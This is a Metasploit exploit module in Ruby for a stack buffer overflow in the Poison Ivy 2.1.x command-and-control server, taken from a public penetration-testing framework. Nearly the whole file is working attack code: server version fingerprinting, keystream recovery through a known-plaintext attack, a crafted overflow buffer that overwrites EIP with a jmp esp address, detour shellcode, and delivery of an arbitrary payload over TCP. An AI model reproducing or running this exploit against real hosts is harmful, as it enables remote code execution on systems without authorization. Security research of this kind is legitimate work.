poisonivy_21x_bof.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Poison Ivy 2.1.x C2 Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.
        The exploit does not need to know the password chosen for the bot/server communication.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jos Wetzels' # Vulnerability Discovery, exploit & Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ],
        ],
      'DisclosureDate' => 'Jun 03 2016',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'             => 0x847 # limited by amount of known plaintext (hard upper limit is 0xFFD)
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Poison Ivy 2.1.4 on Windows XP SP3',
            {
              'Ret' => 0x00469159, # jmp esp from "Poison Ivy 2.1.4.exe"
              'StoreAddress' => 0x00520000, # .tls section address from "Poison Ivy 2.1.4.exe"
              'InfoSizeOffset' => 0x1111, # offset of InfoSize variable
              'DecompressSizeOffset' => 0x1109, # offset of DecompressSize variable
              'Packet2Offset' => 0xB9E # offset of second packet within server's response
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(3460)
      ], self.class)

  end

  # XOR two strings
  def xor_strings(s1, s2)
    s1.unpack('C*').zip(s2.unpack('C*')).map{ |a,b| a ^ b }.pack('C*')
  end

  # Obtain keystream using known plaintext
  def get_keystream(ciphertext, knownPlaintext)
    if(ciphertext.length < knownPlaintext.length)
      return xor_strings(ciphertext, knownPlaintext[0, ciphertext.length])
    else
      return xor_strings(ciphertext, knownPlaintext)
    end
  end

  # Apply keystream to plaintext
  def use_keystream(plaintext, keyStream)
    if(keyStream.length > plaintext.length)
      return xor_strings(plaintext, keyStream[0, plaintext.length])
    else
      return xor_strings(plaintext, keyStream)
    end
  end

  def check
    connect
    # Poke
    sock.put("\x01")
    # Fetch response
    response = sock.get_once(6)

    if (response == "\x89\xFF\x90\x0B\x00\x00")
      vprint_status("Poison Ivy C&C version 2.1.4 detected.")
      return Exploit::CheckCode::Appears
    elsif (response == "\x89\xFF\x38\xE0\x00\x00")
      vprint_status("Poison Ivy C&C version 2.0.0 detected.")
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # Known plaintext from C2 packet
    knownPlaintext1 = "\x89\x00\x69\x0c\x00\x00"
    knownPlaintext2 = "\x69\x0c\x00\x00\x44\xb8\x00\x04\x07\x00\x6d\x70\x72\x2e\x64\x00\x6c\x6c\x05\x0c\x00\x61\x76\x69\x20\x63\x61\x70\x33\x32\x01\x70\x06\x0b\x00\x00\x70\x73\x74\x6f\x72\x65\x63\x01\x01\x34\x08\x0b\x00\x73\x68\x65\x6c\x02\x6c\x03\x6c\x0a\x09\x00\x67\x64\x69\x01\x03\x2c\x0b\x0c\x00\x69\x70\x68\x6c\x10\x70\x61\x70\x69\x01\x50\x0c\x0b\x01\x20\x63\x72\x79\x70\x74\x03\x38\x02\x00\x00\x1d\x03\x00\x00\x00\x55\x8b\xec\x00\x81\xc4\x04\xf0\xff\xff\x50\x81\x00\xc4\x64\xfa\xff\xff\x53\x56\x57\x00\x8b\xf1\x89\x55\xdc\x89\x45\xe0\x00\x8b\x5d\xe0\x8b\x83\x17\x07\x00\x80\x00\x89\x45\xb8\x8b\x83\xc4\x00\x2c\x10\x89\x45\xe8\x8b\x00\x0b\x40\x08\x05\x02\x12\x00\x3b\x89\x45\xe4\x64\xff\x35\x01\x00\x16\x00\x8f\x45\xec\xff\x75\xe8\x00\x8f\x45\xf0\xff\x75\xe4\x8f\x45\x80\xf4\x8d\x45\xec\x64\x89\x05\x01\x18\x00\x89\x65\xf8\x89\x6d\xfc\x8b\x45\x40\xdc\x33\xd2\x89\x50\x02\x00\x07\xc6\x00\x00\x89\xc6\x45\xbf\x00\x83\xbb\x02\xd8\x01\x1e\x0f\x84\x93\x02\x00\x00\x29\x00\x52\x05\xf8\x00\x07\x50\x00\x08\xff\x90\x22\xe0\x00\x09\x8d\x83\xe0\x00\x1e\x50\x8d\x08\x85\x65\xea\x00\x4c\xff\x53\x04\x85\x00\xf6\x74\x14\x83\x7e\x04\x00\x7e\x22\x0e\x80\x21\x8b\x56\x04\x00\x26\x33\xc0\x40\x89\x46\x08\xc7\x45\xc0\x00\x17\x00\x09\x80\x05\x45\xc8\x01\x02\xc4\x8d\x45\xc4\x50\x50\x8d\x45\xc8\x00\x25\xc0\x03\x27\x6c\x41\x80\x0f\x6a\x04\x68\x00\x10\x81\x33\xc8\x00\x50\x6a\x00\xff\x53\x2c\x89\x45\x02\xd4\x06\x40\xdb\x01\x00\x00\x68\x51\x80\x14\x00\x00\x8d\x85\x67\xeb\x01\x36\x0c\x93\x90\x00\x3d\x81\x25\xd8\x33\xff\x80\x80\x7d\xbf\x00\x75\x34\xbf\x06\x80\x08\xee\x57\x00\x3c\x00\x48\x84\x11\x8c\x81\x08\x84\x18\x06\x03\x55\x04\x56\x08\x00\x70\x01\x00\x58\x1f\x02\x58\x19\x00\x8b\x46\x04\x2b\x46\x08\x3d\xfc\x00\x0f\x00\x00\x7d\x05\x89\x45\xd8\x20\xeb\x07\xc7\x45\xd8\x81\x06\x01\x7d\x00\xd8\x83\x7d\xd8\x00\x0f\x86\x58\x01\x00\x41\x29\x7d\xd8\x8b\x45\xd8\x89\x14\x45\xcc\x03\x09\x0f\x00\x09\x69\x45\xc8\x81\x81\x09\x89\x45\xd0\x8b\x45\xd4\x00\x35\x04\xcc\x50\x44\x31\xd0\x50\x8d\x47\x08\x18\x8d\x84\x05\xc2\x22\x40\x0d\x50\x8b\x06\x00\x33\xd2\x52\x50\x8b\x46\x08\x99\x00\x03\x04\x24\x13\x54\x24\x04\x83\x14\xc4\x08\x47\x40\x70\x40\x40\x85\xc0\x74\x62\x30\xc3\x17\x8b\x45\xcc\xd3\x0b\xc8\x14\xff\x86\x93\xc1\x37\x40\x0a\x3b\x45\xd8\x72\xee\x0d\xa0\x6a\x04\x8d\x45\xd8\x80\x28\x04\x85\x28\x21\x83\x13\x83\x45\xcc\x04\x01\x1f\x8d\x47\x17\x06\x06\x89\x02\x85\x7a\x08\x81\x0f\xcc\x50\x8d\x0c\x84\x3d\x88\x5a\xc1\x0e\x03\x7d\xcc\x57\x59\x84\x5a\x8b\x83\x41\x8f\x40\x38\xe0\xc0\x00\xb8\x08\xff\x90\xa4\x40\x38\x84\xc0\x74\x13\x00\x85\xf6\x0f\x84\x23\xfe\xff\xff\x41\x40\x3a\x01\x46\x08\xe9\x18\x80\x02\x68\x0e\x02\x40\x52\xc5\x91\x82\x76\x68\x00\x80\x00\x84\x00\x6a\x00\x9d\xd4\x50\xff\x53\x00\x37\x2a\xb8\xc8\x9e\xe4\x00\x12\x90\x01\x00\x5f\x5e\x00\x5b\x8b\xe5\x5d\xc3\x76\x00\x19\x23\x80\x0f\xc1\xc8\x83\xc4\xe4\x41\xc6\x5d\x10\x20\x8b\x45\x08\x8b\xb0\x01\xc5\x8b\x80\xc9\x45\xc4\x86\xd8\x00\x09\x05\xdd\x80\x84\x68\xc4\x00\x0c\x83\x3b\x00\x7e\x17\x8b\x13\x00\x3b\x50\x04\x74\x10\x8b\x13\x81\x00\xc2\xff\x1f\x00\x00\x81\xe2\x00\x00\xe0\xff\xff\x89\x13\x8b\x38\x8b\x00\xd7\x8b\x0b\x3b\x48\x0c\x74\x60\x81\xc0\x04\x75\x1b\x57\xff\x96\xdc\x60\x0c\xb4\x8b\xf8\x00\x01\xe0\x00\x01\xc0\x00\xe4\xc0\x00\x00\x33\xd2\xeb\x40\x83\x78\x0c\x00\x00\x75\x18\x8b\x03\x50\x6a\x02\xff\x2c\x96\xe8\x80\x02\x82\x04\xec\x01\x01\xd0\xeb\x26\x22\x00\x05\x0a\x07\x6a\x02\x20\x05\x57\xff\x9c\x56\x60\x00\x03\x63\x04\xc2\x1d\x8b\xc2\x03\x1e\x08\xc2\x0c\x00\xa0\x1c\x55\x51\x89\x0c\x00\x24\x8b\xfa\x8b\xf0\x8b\xc6\x8b\x02\xa8\x42\x1d\xdf\x54\x57\x56\xff\x95\x01\xc1\x1c\x89\x03\x8b\x04\x24\x89\x43\x08\x0c\x5a\x5d\x20\x06\xc3\x71\x00\x21\x43\xa0\x1e\x60\x06\x8b\xc8\x8b\xb1\x22\x05\xda\x60\x33\xc9\xff\x96\xd4\xa0\x0f\x20\x68\x43\x02\x04\x81\x00\x08\x5e\x5b\xc3\x72\x00\x82\x2a\xec\x04\xca\x33\xdb\x89\x19\x60\x00\xd4\x59\x04\x81\x00\x08\x81\x00\x0c\x45\x07\x00\x06\x58\x73\x00\xa6\x01\x06\x80\x93\x51\xc1\x2e\x55\x22\x0c\xc1\x2e\xf0\x8b\xbe\x63\x0c\x83\x7b\x00\x08\x00\x7c\x53\x83\x7d\x14\x00\x00\x7c\x4d\x8b\x4b\x08\x03\x4d\x14\x00\x89\x4d\xfc\x83\x7d\xfc\x00\x7e\x80\x3e\x8b\x4d\xfc\x3b\x4b\x04\x00\x2b\x91\xe1\x00\x0c\x7e\x09\xe0\x01\xff\x97\xe1\x11\xa0\x8b\x45\xfc\x89\x43\x00\x50\x14\x40\x46\x00\x10\x50\x8b\x03\x03\x43\x08\x50\x0c\xff\x96\xe3\x5c\x20\x03\x08\x8b\x45\x14\x10\xeb\x02\x33\xc0\xa0\x1a\x59\x5d\xc2\xc0\x10\x00\x8b\xc0\x53\x56\x86\x1a\x9c\x15\x18\x74\x00\x3e\x00\x1e\xa8\x44\x7d\x14\x8b\x50\x55\x08\x8b\x82\x82\x15\x8a\xa2\x44\x4d\x90\xe8\x8b\x80\xd0\x80\x04\x05\x85\xc0\x1a\x05\xbf\x44\x00\xe4\xa6\x5d\x0c\x8b\x43\x08\x00\x85\xc0\x7c\x28\x85\xff\x7c\x24\x00\x8b\x73\x04\x2b\xf0\x85\xf6\x7e\x00\x1b\x3b\xfe\x7d\x02\x8b\xf7\x56\x00\x8b\x0b\x03\xc8\x51\x8b\x45\x10\x08\x50\xff\x92\xc1\x18\x01\x73\x08\xeb\xc2\x07\xa2\x39\x33\xf6\x8b\xc6\xe0\x18\x00\x58\x77\x02\x19\x9f\x28\x9f\x28\xfc\x9f\x28\x9f\x28\x3a\x3e\x75\x1c\x00\x2d\x21\x3e\xdf\x4f\xc8\x4f\x77\x01\x67\x00\x85\xfd\x47\x00\x78\x01\x6e\x74\x00\xbc\x88\x00\x79\x01\x6a\x6b\xdf\x00\x5c\x00\x7a\x01\xc3\x53\xa3\x83\x00\x00\x7b\x01\xb5\xad\x12\x2e\x00\x00\x18\x01\x93\xae\x6a\x9d\x00\x1c\x00\x01\x8c\xad\x5d\xdb\x00\x1f\x03\x00\x4d\x26\xab\x1c\x00\x20\x01\xc4\x00\x09\x78\x78\x00\x22\x03\x23\xd5\x00\x1f\xda\x00\x23\x01\x60\x3b\x66\x00\x86\x00\x24\x07\x69\x5b\x5d\xbb\x00\x00\x25\x01\x75\xc0\xd4\x44\x00\x00\x45\x01\x75\xd7\xd0\xa7\x00\x46\x00\x01\x09\xb4\x58\x3b\x00\x47\x01\x00\xc7\x69\x89\xc3\x00\x48\x01\x17\x00\x3f\x53\x1e\x00\x49\x01\x69\x1f\x00\x19\xf0\x00\x4b\x03\x0b\xb5\xf9\x00\x49\x00\x7c\x05\x2c\x88\x92\x65\x90\x00\x03\x00\xb6\xc6\xe9\xf0\xf7\xe3\xe8\x00\xf0\x89\x75\xb0\x8b\x45\xb0\x8b\x0e\x98\x22\x41\x00\x01\x46\x86\x43\x0c\x05\xab\x07\x3f\xe8\x01\x11\x93\x20\x8d\x55\x9c\x8b\xc6\x98\xff\x93\xc8\x20\x24\x01\x05\x80\xdc\xa0\x01\x00\x56\x8b\xf0\x8d\xbd\x6c\xff\xff\x84\xff\xa5\x00\x00\x5e\xc7\x45\xc8\x20\x6e\x32\x00\xb1\x6f\x8d\x85\x51\x01\x70\x2e\xb0\x8b\x02\x80\x82\x52\xff\x53\x7c\x8d\x85\x7c\x11\x90\x02\x50\xff\x93\xc0\x4f\x00\xff\xb5\x62\x70\xc0\x00\xff\x93\x88\x50\x04\x61\x02\xff\xa0\x50\x24\x89\x45\xc8\x81\x57\xc8\x70\x66\xc0\x9c\x50\x56\xff\x93\xcc\x90\x06\x20\x05\x4e\xff\x10\x02\xda\x73\xd0\x07\xff\x50\x00\x74\xcc\x9d\x43\x76\xcc\x10\x05\xc1\x27\xf1\x09\x4d\xcc\x20\x0a\x0c\x53\x6c\xf6\x55\x70\x66\x45\xb0\xff\x50\xf2\x30\x40\x40\x45\xc8\xe1\x02\xb0\x77\x12\x58\x0f\x05\x3f\x0b\x05\x01\x78\x0f\x05\xb1\x63\xd2\x07\x30\x5b\xb0\x8d\x0c\x88\xeb\x90\x09\x41\x02\xc6\xff\x53\x6c\xe8\xc7\x85\xd0\xa0\x5e\x9c\x11\x01\x92\x00\x40\x09\xca\x94\xc0\x00\x68\x18\x01\x8d\x45\x66\x0d\x71\x0e\x0a\x84\x79\x0e\x6a\x60\x41\xb0\x05\x57\x04\x94\x00\x00\x5a\x01\x01\xd0\x06\x05\x5b\x5c\x01\x39\x30\x01\x8b\x80\x71\x13\x90\x7c\xb0\x00\xff\x90\x16\xa4\x80\x06\xf0\x06\x14\x91\x19\xf8\xff\x93\x16\x24\x70\x00\xe0\x00\x18\x60\x00\x89\x45\xc4\x2c\x68\x00\x70\x00\x69\x02\x1c\xf0\x00\x6a\x0f\x35\x66\x02\x20\xe1\x00\x0a\x02\x02\x31\x05\x0f\x31\x13\x50\x97\xb0\x97\x68\xf4\x70\x01\xff\x55\xd8\xc0\x0f\x31\x2b\x45\xe0\x1b\xb2\x98\x50\x01\xee\x8b\xa0\x8d\x9a\x03\x20\x89\xb0\x06\x08\x92\x05\x90\x77\x06\xe0\x39\x0c\xa1\x17\xb8\x6a\x00\x6a\x01\x03\x70\x5f\xb1\x18\x0c\x89\x45\xc0\x83\x7d\xb0\xc0\xff\x74\x41\x40\x01\xb0\x22\xbc\x20\x85\x61\x00\x0e\x8d\x85\x94\xf8\xa0\x8f\x31\x01\x68\x80\x7f\x74\x04\x40\x8b\x45\xc0\x30\x0c\x02\x2c\x40\x08\x33\xd2\x83\xfa\xff\x75\x20\x03\x83\xf8\xff\x74\x90\x97\xbc\xb9\x62\x4c\xd0\x0e\x99\xf7\xf9\x00\xa1\x51\x14\xb8\x03\xb9\x06\xc0\x9b\x48\x85\xc0\x72\x20\x40\x20\x89\x45\xac\x8d\xbd\x01\x05\x6a\x4c\x02\x57\x68\x17\x83\xc7\x4c\xff\x4d\xac\x4c\x75\xea\xc1\x05\x11\x0f\x50\x14\xd1\x09\xb4\xda\x6a\x40\x95\x43\xd2\x07\x80\x00\xf2\x80\x33\x00\x29\x0a\xb4\xd0\x07\xf0\xd0\x07\x85\xc0\x74\x1c\xcc\x8d\x8d\x41\x01\x95\x1e\x8d\x8d\xb1\x02\xd5\x00\x00\xff\x45\xb4\x83\x7d\xb4\x0a\x75\x98\xbb\x68\x7d\xc0\x34\x40\x05\x8b\x80\x91\x36\x01\x59\x09\xc6\x45\xd3\x01\x8d\x4d\x9c\x28\x8d\x55\xd2\xc1\x29\x08\x93\x03\x93\xc4\x07\xc0\x05\xa2\x52\x63\x52\xc3\x9b\x09\xf6\x4c\x00\x1f\x0b\x00\x9c\x09\x80\xa3\x44\x00\xba\x00\x9d\x09\x4d\x4b\x58\x5a\x00\x00\x6b\x01\x3f\x05\x3b\x6a\x00\x00\xb8\x09\x9c\xb5\x85\x98\x00\xb9\x00\x09\xf0\x76\xf1\xce\x00\xa9\x00\x0e\x82\x20\x10\xb1\x5e\x82\x69\x5d\x14\x8b\x7d\x01\xf0\x9e\xff\x00\x33\xf6\x6a\x00\x53\x09\xc0\x58\x03\xc6\xf0\x0b\x0c\x50\xff\x57\x0a\x18\x31\x13\x10\x10\x0c\x0c\x03\xf0\x2b\x00\xd8\x85\xdb\x75\xdf\xc6\x45\xff\xb0\x01\x8a\x45\xff\x20\x07\x12\x66\x90\xa2\x4e\x0c\x8b\xe9\x84\x76\x32\x42\x55\xff\x53\x70\x00\x88\x04\x24\x6a\x01\x8d\x44\x24\x0c\x04\x50\x30\x77\x72\x38\x33\xc0\x8a\x04\x18\x24\x50\x55\xe5\x00\xa3\x77\x1b\x00\x3e\x7b\x81\x08\x4f\x04\x00\x4f\x04\xc1\x3c\x4f\x04\x60\x76\xbd\x00\x02\xf7\x6c\x55\xd8\x00"

    # detour shellcode (mov eax, StoreAddress; jmp eax)
    detourShellcode =  "\xB8" + [target['StoreAddress']].pack("V") # mov eax, StoreAddress
    detourShellcode << "\xFF\xE0" # jmp eax

    # Padding where necessary
    compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length)

    # Construct exploit buffer
    exploitBuffer =  "A" * 4              # infoLen (placeholder)
    exploitBuffer << compressedBuffer     # compressedBuffer
    exploitBuffer << "\xFF" * 0x104       # readfds
    exploitBuffer << "C" * 4              # compressionType
    exploitBuffer << "D" * 4              # decompressSize (placeholder)
    exploitBuffer << "E" * 4              # pDestinationSize
    exploitBuffer << "F" * 4              # infoSize (placeholder)
    exploitBuffer << "G" * 4              # headerAllocSize
    exploitBuffer << [target['StoreAddress']].pack("V") # decompressBuffer
    exploitBuffer << "H" * 2              # decompressBuffer+4
    exploitBuffer << "I" * 6              # lParam
    exploitBuffer << "J" * 8              # timeout
    exploitBuffer << "K" * 4              # hWnd
    exploitBuffer << "L" * 4              # s
    exploitBuffer << "M" * 4              # old EBP
    exploitBuffer << [target['Ret']].pack("V")    # EIP
    exploitBuffer << [target['StoreAddress']].pack("V")  # arg_0
    exploitBuffer << detourShellcode # detour to storage area

    # Calculate values
    allocSize = exploitBuffer.length + 1024
    infoLen = payload.encoded.length
    infoSize = (infoLen + 4)

    # Handshake
    connect
    print_status("Performing handshake...")

    # Poke
    sock.put("\x01")

    # Fetch response
    response = sock.get(target['Packet2Offset'] + knownPlaintext1.length + infoSize)

    eHeader = response[target['Packet2Offset'], 6]
    eInfo = response[target['Packet2Offset'] + 10..-1]

    if ((eHeader.length >= knownPlaintext1.length) and (knownPlaintext1.length >= 6) and (eInfo.length >= knownPlaintext2.length) and (knownPlaintext2.length >= infoSize))
      # Keystream derivation using Known Plaintext Attack
      keyStream1 = get_keystream(eHeader, knownPlaintext1)
      keyStream2 = get_keystream(eInfo, knownPlaintext2)

      # Set correct infoLen
      exploitBuffer = [infoLen].pack("V") + exploitBuffer[4..-1]

      # Set correct decompressSize
      exploitBuffer = exploitBuffer[0, target['DecompressSizeOffset']] + [infoSize].pack("V") + exploitBuffer[(target['DecompressSizeOffset'] + 4)..-1]

      # Build packet
      malHeader = use_keystream("\x89\x01" + [allocSize].pack("V"), keyStream1)

      # Encrypt infoSize bytes
      encryptedExploitBuffer = use_keystream(exploitBuffer[0, infoSize], keyStream2) + exploitBuffer[infoSize..-1]

      # Make sure infoSize gets overwritten properly since it is processed before decryption
      encryptedExploitBuffer = encryptedExploitBuffer[0, target['InfoSizeOffset']] + [infoSize].pack("V") + encryptedExploitBuffer[target['InfoSizeOffset']+4..-1]

      # Finalize packet
      exploitPacket = malHeader + [encryptedExploitBuffer.length].pack("V") + encryptedExploitBuffer

      print_status("Sending exploit...")
      # Send exploit
      sock.put(exploitPacket)
    else
      print_status("Not enough keystream available...")
    end

    select(nil,nil,nil,5)
    disconnect
  end

end